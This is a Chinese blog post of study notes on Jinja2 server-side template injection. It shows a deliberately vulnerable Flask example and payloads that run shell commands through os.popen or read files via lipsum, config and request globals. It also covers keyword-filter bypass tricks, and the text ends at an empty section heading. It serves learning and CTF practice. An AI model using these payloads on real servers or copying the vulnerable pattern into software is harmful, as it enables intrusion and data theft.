

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/biaotou.png">
  <link rel="icon" href="/img/biaotou.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="orange">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言:主要讲的python的jinjia2,如果以后遇到其他相关的会继续补充。 参考文章: 1.SSTI（模板注入）漏洞（入门篇) 2.SSTI模板注入总结 3.Python模板注入(SSTI)深入学习 4.SSTI模板注入绕过(进阶篇) 5.CTFshow刷题日记-WEB-SSTI(web361-372)_ctfshow ssti 371-CSDN博客  一、基础知识  1.初步了解 SSTI就">
<meta property="og:type" content="article">
<meta property="og:title" content="ssti模板注入学习">
<meta property="og:url" content="https://0ran9ewww.github.io/2024/07/03/%E5%AD%A6%E4%B9%A0%E6%96%87%E7%AB%A0/ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="0raN9e的笔记">
<meta property="og:description" content="前言:主要讲的python的jinjia2,如果以后遇到其他相关的会继续补充。 参考文章: 1.SSTI（模板注入）漏洞（入门篇) 2.SSTI模板注入总结 3.Python模板注入(SSTI)深入学习 4.SSTI模板注入绕过(进阶篇) 5.CTFshow刷题日记-WEB-SSTI(web361-372)_ctfshow ssti 371-CSDN博客  一、基础知识  1.初步了解 SSTI就">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://0ran9ewww.github.io/images/%E6%96%87%E7%AB%A0/ssti/1.png">
<meta property="og:image" content="https://0ran9ewww.github.io/images/%E6%96%87%E7%AB%A0/ssti/2.png">
<meta property="og:image" content="https://0ran9ewww.github.io/images/%E6%96%87%E7%AB%A0/ssti/3.png">
<meta property="og:image" content="https://0ran9ewww.github.io/images/%E6%96%87%E7%AB%A0/ssti/4.png">
<meta property="og:image" content="https://0ran9ewww.github.io/images/%E6%96%87%E7%AB%A0/ssti/361-1.png">
<meta property="og:image" content="https://0ran9ewww.github.io/images/%E6%96%87%E7%AB%A0/ssti/361-2.png">
<meta property="og:image" content="https://0ran9ewww.github.io/images/%E6%96%87%E7%AB%A0/ssti/361-3.png">
<meta property="og:image" content="https://0ran9ewww.github.io/images/%E6%96%87%E7%AB%A0/ssti/364.png">
<meta property="og:image" content="https://0ran9ewww.github.io/images/%E6%96%87%E7%AB%A0/ssti/366.png">
<meta property="og:image" content="https://0ran9ewww.github.io/images/%E6%96%87%E7%AB%A0/ssti/369.png">
<meta property="article:published_time" content="2024-07-03T05:10:00.000Z">
<meta property="article:modified_time" content="2024-07-10T01:56:40.000Z">
<meta property="article:author" content="orange">
<meta property="article:tag" content="ssti">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://0ran9ewww.github.io/images/%E6%96%87%E7%AB%A0/ssti/1.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>ssti模板注入学习 - 0raN9e的笔记</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"0ran9ewww.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"y20YQnBmfM0DqawGjwxeWhCq-gzGzoHsz","app_key":"Y55Ca02EpnhoEzDEjf7sqVwX","server_url":null,"path":"window.location.pathname","ignore_local":true}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>0raN9e的blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/images/%E6%96%87%E7%AB%A0/bg.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="ssti模板注入学习"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-07-03 13:10" pubdate>
          2024年7月3日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          41 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">ssti模板注入学习</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2024年7月10日 上午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <p>前言:主要讲的python的jinjia2,如果以后遇到其他相关的会继续补充。</p>
<p>参考文章:</p>
<p>1.<a target="_blank" rel="noopener" href="https://www.cnblogs.com/bmjoker/p/13508538.html">SSTI（模板注入）漏洞（入门篇)</a></p>
<p>2.<a target="_blank" rel="noopener" href="https://blog.csdn.net/Manuffer/article/details/120739989?ops_request_misc=%7B%22request%5Fid%22%3A%22171998276316800182178648%22%2C%22scm%22%3A%2220140713.130102334.pc%5Fblog.%22%7D&amp;request_id=171998276316800182178648&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~hot_rank-5-120739989-null-null.nonecase&amp;utm_term=ssit&amp;spm=1018.2226.3001.4450">SSTI模板注入总结</a></p>
<p>3.<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/6885?time__1311=n4%2BxnD0DRDyB5q053b7eit7Dt3MKAKDkWeD&amp;alichlgref=https%3A%2F%2Fcn.bing.com%2F#toc-0">Python模板注入(SSTI)深入学习</a></p>
<p>4.<a target="_blank" rel="noopener" href="https://blog.csdn.net/miuzzx/article/details/110220425">SSTI模板注入绕过(进阶篇)</a></p>
<p>5.<a target="_blank" rel="noopener" href="https://blog.csdn.net/q20010619/article/details/120493997">CTFshow刷题日记-WEB-SSTI(web361-372)_ctfshow ssti 371-CSDN博客</a></p>
<h2 id="一-基础知识"><a class="markdownIt-Anchor" href="#一-基础知识"></a> 一、基础知识</h2>
<h3 id="1初步了解"><a class="markdownIt-Anchor" href="#1初步了解"></a> 1.初步了解</h3>
<p>SSTI就是服务器端模板注入(Server-Side Template Injection)</p>
<p>当使用一些框架的时候，服务端接收了用户的恶意输入以,未经处理就将其作为 Web 应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，执行了用户插入的可以破坏模板的语句，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。</p>
<p>举个简单的例子</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs markdown">from flask import Flask, request, render<span class="hljs-emphasis">_template_</span>string<br>app = Flask(<span class="hljs-strong">__name__</span>)<br>@app.route(&#x27;/&#x27;)<br>def home():<br><span class="hljs-code">    return &#x27;&#x27;&#x27;</span><br><span class="hljs-code">    &lt;form action=&quot;/greet&quot; method=&quot;post&quot;&gt;</span><br><span class="hljs-code">        &lt;label for=&quot;name&quot;&gt;Enter your name:&lt;/label&gt;</span><br><span class="hljs-code">        &lt;input type=&quot;text&quot; id=&quot;name&quot; name=&quot;name&quot;&gt;</span><br><span class="hljs-code">        &lt;input type=&quot;submit&quot; value=&quot;Greet me&quot;&gt;</span><br><span class="hljs-code">    &lt;/form&gt;</span><br><span class="hljs-code">    &#x27;&#x27;&#x27;</span><br><span class="hljs-code">@app.route(&#x27;/greet&#x27;, methods=[&#x27;POST&#x27;])</span><br><span class="hljs-code">def greet():</span><br><span class="hljs-code">    name = request.form[&#x27;name&#x27;]</span><br><span class="hljs-code">    # 这里使用 render_template_string 存在模板注入风险</span><br><span class="hljs-code">    template = f&quot;Hello, &#123;name&#125;!&quot;</span><br><span class="hljs-code">    return render_template_string(template)</span><br><span class="hljs-code">if __name__ == &#x27;__main__&#x27;:</span><br><span class="hljs-code">    app.run(debug=True)</span><br></code></pre></td></tr></table></figure>
<p><img src="/../../images/%E6%96%87%E7%AB%A0/ssti/1.png" srcset="/img/loading.gif" lazyload alt="ex1"></p>
<p><img src="/../../images/%E6%96%87%E7%AB%A0/ssti/2.png" srcset="/img/loading.gif" lazyload alt="ex2"></p>
<h3 id="2简单判断"><a class="markdownIt-Anchor" href="#2简单判断"></a> 2.简单判断</h3>
<p>模板引擎其实有许多种，上面的例子只是python的一种。</p>
<p><img src="/../../images/%E6%96%87%E7%AB%A0/ssti/3.png" srcset="/img/loading.gif" lazyload alt="pic"></p>
<p>可以通过简要的尝试进行初步判断类型。</p>
<p><img src="/../../images/%E6%96%87%E7%AB%A0/ssti/4.png" srcset="/img/loading.gif" lazyload alt="判断"></p>
<h2 id="二-语法"><a class="markdownIt-Anchor" href="#二-语法"></a> 二、语法</h2>
<h3 id="1基础语法"><a class="markdownIt-Anchor" href="#1基础语法"></a> 1.基础语法</h3>
<p>在python中，主要流程是按照类-&gt;基类-&gt;子类-&gt;危险函数的流程利用ssti，首先了解一下语法。</p>
<h4 id="1__class__"><a class="markdownIt-Anchor" href="#1__class__"></a> 1.__class__</h4>
<p>用来查看变量所属的类,格式为<code>变量.__class__</code></p>
<p>比如字符串得到的就是<code>&lt;class 'str'&gt;</code></p>
<h4 id="2__bases__"><a class="markdownIt-Anchor" href="#2__bases__"></a> 2.__bases__</h4>
<p>以元组的形式返回类所直接继承的类。，注意是类的基类，格式为<code>变量.__class__.__bases__</code></p>
<p>同时也可以加上数组，比如<code>变量.__class__.__bases__[0]</code>来获得第一个基类。</p>
<p>ps(base是以字符串的形式返回类的基类)</p>
<h4 id="3__mro__"><a class="markdownIt-Anchor" href="#3__mro__"></a> 3.__mro__</h4>
<p>返回一个包含对象所继承的基类元组,返回解析方法调用的顺序。</p>
<h4 id="4__subclasses__"><a class="markdownIt-Anchor" href="#4__subclasses__"></a> 4.__subclasses__()</h4>
<p>获取类的所有子类，同时也可以在末尾加数组，指定索引值。</p>
<h4 id="5__init__"><a class="markdownIt-Anchor" href="#5__init__"></a> 5.__init__</h4>
<p>类的初始化，返回为function。便于利用该函数调用globals。</p>
<h4 id="6__globals__"><a class="markdownIt-Anchor" href="#6__globals__"></a> 6.__globals__</h4>
<p><code>function.__globals__</code>，用于获取function所处空间下可使用的module、方法以及所有变量。</p>
<hr>
<p>以上是常见的一些基本语法内容</p>
<h3 id="2类的知识总结"><a class="markdownIt-Anchor" href="#2类的知识总结"></a> 2.类的知识总结</h3>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><span class="hljs-strong">__class__</span>            类的一个内置属性，表示实例对象的类。<br><span class="hljs-strong">__base__</span>             类型对象的直接基类<br><span class="hljs-strong">__bases__</span>            类型对象的全部基类，以元组形式，类型的实例通常没有属性 <span class="hljs-strong">__bases__</span><br><span class="hljs-strong">__mro__</span>              此属性是由类组成的元组，在方法解析期间会基于它来查找基类。<br><span class="hljs-strong">__subclasses__</span>()     返回这个类的子类集合，<br><span class="hljs-strong">__init__</span>             初始化类，返回的类型是function<br><span class="hljs-strong">__globals__</span>          使用方式是 函数名.<span class="hljs-strong">__globals__</span>获取function所处空间下可使用的module、方法以及所有变量。<br><span class="hljs-strong">__dic__</span>              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的<span class="hljs-strong">__dict__</span>里<br><span class="hljs-strong">__getattribute__</span>()   实例、类、函数都具有的<span class="hljs-strong">__getattribute__</span>魔术方法。事实上，在实例化的对象进行.操作的时候（形如：a.xxx/a.xxx()），都会自动去调用<span class="hljs-strong">__getattribute__</span>方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。<br><span class="hljs-strong">__getitem__</span>()        调用字典中的键值，其实就是调用这个魔术方法，比如a[&#x27;b&#x27;]，就是a.<span class="hljs-strong">__getitem__</span>(&#x27;b&#x27;)<br><span class="hljs-strong">__builtins__</span>         内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身。即里面有很多常用的函数。<span class="hljs-strong">__builtins__</span>与<span class="hljs-strong">__builtin__</span>的区别就不放了，百度都有。<br><span class="hljs-strong">__import__</span>           动态加载类和函数，也就是导入模块，经常用于导入os模块，<span class="hljs-strong">__import__</span>(&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()]<br><span class="hljs-strong">__str__</span>()            返回描写这个对象的字符串，可以理解成就是打印出来。<br>url<span class="hljs-emphasis">_for              flask的一个方法，可以用于得到<span class="hljs-strong">__builtins__</span>，而且url_</span>for.<span class="hljs-strong">__globals__</span>[&#x27;<span class="hljs-strong">__builtins__</span>&#x27;]含有current<span class="hljs-emphasis">_app。</span><br><span class="hljs-emphasis">get_</span>flashed<span class="hljs-emphasis">_messages flask的一个方法，可以用于得到<span class="hljs-strong">__builtins__</span>，而且url_</span>for.<span class="hljs-strong">__globals__</span>[&#x27;<span class="hljs-strong">__builtins__</span>&#x27;]含有current<span class="hljs-emphasis">_app。</span><br><span class="hljs-emphasis">lipsum               flask的一个方法，可以用于得到<span class="hljs-strong">__builtins__</span>，而且lipsum.<span class="hljs-strong">__globals__</span>含有os模块：&#123;&#123;lipsum.<span class="hljs-strong">__globals__</span>[&#x27;os&#x27;].popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="hljs-emphasis">current_</span>app          应用上下文，一个全局变量。<br><br>request              可以用于获取字符串来绕过，包括下面这些，引用一下羽师傅的。此外，同样可以获取open函数:request.<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>[&#x27;<span class="hljs-strong">__builtins__</span>&#x27;].open(&#x27;/proc\self\fd/3&#x27;).read()<br>request.args.x1   	 get传参<br>request.values.x1 	 所有参数<br>request.cookies      cookies参数<br>request.headers      请求头参数<br>request.form.x1   	 post传参	(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)<br>request.data  		 post传参	(Content-Type:a/b)<br>request.json		 post传json  (Content-Type: application/json)<br>config               当前application的所有配置。此外，也可以这样&#123;&#123; config.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>[&#x27;os&#x27;].popen(&#x27;ls&#x27;).read() &#125;&#125;<br>g                    &#123;&#123;g&#125;&#125;得到<span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">flask.g</span> <span class="hljs-attr">of</span> &#x27;<span class="hljs-attr">flask_ssti</span>&#x27;&gt;</span></span><br></code></pre></td></tr></table></figure>
<h3 id="3常见过滤器"><a class="markdownIt-Anchor" href="#3常见过滤器"></a> 3.常见过滤器</h3>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs markdown">常用的过滤器<br>int()：将值转换为int类型；<br>float()：将值转换为float类型；<br>lower()：将字符串转换为小写；<br>upper()：将字符串转换为大写；<br>title()：把值中的每个单词的首字母都转成大写<br>capitalize()：把变量值的首字母转成大写，其余字母转小写；<br>trim()：截取字符串前面和后面的空白字符；<br>wordcount()：计算一个长字符串中单词的个数；<br>reverse()：字符串反转；<br>replace(value,old,new)： 替换将old替换为new的字符串；<br>truncate(value,length=255,killwords=False)：截取length长度的字符串；<br>striptags()：删除字符串中所有的HTML标签，如果出现多个空格，将替换成一个空格；<br>escape()或e：转义字符，会将&lt;、&gt;等符号转义成HTML中的符号。显例：content|escape或content|e。<br>safe()： 禁用HTML转义，如果开启了全局转义，那么safe过滤器会将变量关掉转义。示例： &#123;&#123;&#x27;<span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">em</span>&gt;</span></span>hello<span class="language-xml"><span class="hljs-tag">&lt;/<span class="hljs-name">em</span>&gt;</span></span>&#x27;|safe&#125;&#125;；<br>list()：将变量列成列表；<br>string()：将变量转换成字符串；<br>join()：将一个序列中的参数值拼接成字符串。示例看上面payload；<br>abs()：返回一个数值的绝对值；<br>first()：返回一个序列的第一个元素；<br>last()：返回一个序列的最后一个元素；<br>format(value,arags,<span class="hljs-emphasis">*kwargs)：格式化字符串。比如：&#123;&#123; &quot;%s&quot; - &quot;%s&quot;|format(&#x27;Hello?&#x27;,&quot;Foo!&quot;) &#125;&#125;将输出：Helloo? - Foo!</span><br><span class="hljs-emphasis"></span><br><span class="hljs-emphasis">length()：返回一个序列或者字典的长度；</span><br><span class="hljs-emphasis">sum()：返回列表内数值的和；</span><br><span class="hljs-emphasis">sort()：返回排序后的列表；</span><br><span class="hljs-emphasis">default(value,default_value,boolean=false)：如果当前变量没有值，则会使用参数中的值来代替。示例：name|default(&#x27;xiaotuo&#x27;)----如果name不存在，则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会用default中的值，如果想使用python的形式判断是否为false，则可以传递boolean=true。也可以使用or来替换。</span><br><span class="hljs-emphasis">length()返回字符串的长度，别名是count</span><br></code></pre></td></tr></table></figure>
<p>对于2.3两个是直接进行转载便于自身本地的及时查找。</p>
<h2 id="三-进阶知识"><a class="markdownIt-Anchor" href="#三-进阶知识"></a> 三、进阶知识</h2>
<h3 id="1模板语法"><a class="markdownIt-Anchor" href="#1模板语法"></a> 1.模板语法</h3>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs markdown">&#123;%...%&#125;可以进行声明变量，也可以进行循环语句和条件语句<br><br>&#123;&#123;...&#125;&#125;将表达式打印到模板输出<br><br>&#123;#...#&#125;表示未包含在模板输出中的注释<br><br><span class="hljs-section">##可以有和&#123;%%&#125;相同的效果</span><br></code></pre></td></tr></table></figure>
<h3 id="2变量"><a class="markdownIt-Anchor" href="#2变量"></a> 2.变量</h3>
<p>标准的python语法使用点<code>（.）</code>外，还可以使用中括号<code>（[]）</code>来访问变量的属性。也就是</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;&#123;<span class="hljs-string">&quot;&quot;</span>.__class__&#125;&#125;<br>&#123;&#123;<span class="hljs-string">&quot;&quot;</span>[<span class="hljs-string">&#x27;__classs__&#x27;</span>]&#125;&#125;<br></code></pre></td></tr></table></figure>
<p>You can use a dot (.) to access attributes of a variable in addition to the standard Python <strong>getitem</strong> “subscript” syntax ([]). --官方原文</p>
<p>这里就是介绍了如果禁用点可以用中括号，而实际就是调用了getitem这个函数，对于取键值也可以调用这个函数</p>
<hr>
<p>除此之外，除了调用，也可以用自带的一些办法，比如说pop</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs markdown">pop(key[,default])<br>参数<br>key: 要删除的键值<br>default: 如果没有 key，返回 default 值<br>删除字典给定键 key 所对应的值，返回值为被删除的值。key值必须给出。 否则，返回default值。<br></code></pre></td></tr></table></figure>
<p>也可以用<code>list.pop(&quot;var&quot;)</code>,建议不要使用，可能删除导致服务器崩坏。</p>
<p>同时也可以尝试以下两种的情况</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs markdown">dict.get(key, default=None)<br>返回指定键的值，如果值不在字典中返回default值<br><br>dict.setdefault(key, default=None)<br>和get()类似, 但如果键不存在于字典中，将会添加键并将值设为default<br></code></pre></td></tr></table></figure>
<hr>
<p>调用变量的实际情况，应该如</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs markdown">&quot;&quot;.<span class="hljs-strong">__class__</span><br>&quot;&quot;.<span class="hljs-strong">__getattribute__</span>(&quot;<span class="hljs-strong">__class__</span>&quot;)<br></code></pre></td></tr></table></figure>
<p>如果出现了一些过滤，也可以进行简单的绕过</p>
<h3 id="3绕过"><a class="markdownIt-Anchor" href="#3绕过"></a> 3.绕过</h3>
<h4 id="1拼接"><a class="markdownIt-Anchor" href="#1拼接"></a> 1.拼接</h4>
<p>“cla”+“ss”</p>
<p>实际测试的时候，jinjia2默认<code>&quot;cla&quot;&quot;ss&quot;</code>是等同于<code>&quot;class&quot;</code>的，所以也不必加+。</p>
<h4 id="2反转"><a class="markdownIt-Anchor" href="#2反转"></a> 2.反转</h4>
<p>“<strong>ssalc</strong>”[::-1]</p>
<h4 id="3ascii绕过"><a class="markdownIt-Anchor" href="#3ascii绕过"></a> 3.ascii绕过</h4>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 将97转换为对应的字符&#x27;a&#x27;</span><br>char_a = <span class="hljs-string">&quot;&#123;0:c&#125;&quot;</span>.<span class="hljs-built_in">format</span>(<span class="hljs-number">97</span>)<br><span class="hljs-built_in">print</span>(char_a)  <span class="hljs-comment"># 输出: &#x27;a&#x27;</span><br><span class="hljs-comment"># 将多个整数转换为对应的字符并组合成字符串&#x27;__class__&#x27;</span><br>formatted_string = <span class="hljs-string">&quot;&#123;0:c&#125;&#123;1:c&#125;&#123;2:c&#125;&#123;3:c&#125;&#123;4:c&#125;&#123;5:c&#125;&#123;6:c&#125;&#123;7:c&#125;&#123;8:c&#125;&quot;</span>.<span class="hljs-built_in">format</span>(<span class="hljs-number">95</span>, <span class="hljs-number">95</span>, <span class="hljs-number">99</span>, <span class="hljs-number">108</span>, <span class="hljs-number">97</span>, <span class="hljs-number">115</span>, <span class="hljs-number">115</span>, <span class="hljs-number">95</span>, <span class="hljs-number">95</span>)<br><span class="hljs-built_in">print</span>(formatted_string)  <span class="hljs-comment"># 输出: &#x27;__class__&#x27;</span><br></code></pre></td></tr></table></figure>
<p>前面的{0:c}是占位符，类比下去对应后面的内容。</p>
<h4 id="4编码绕过"><a class="markdownIt-Anchor" href="#4编码绕过"></a> 4.编码绕过</h4>
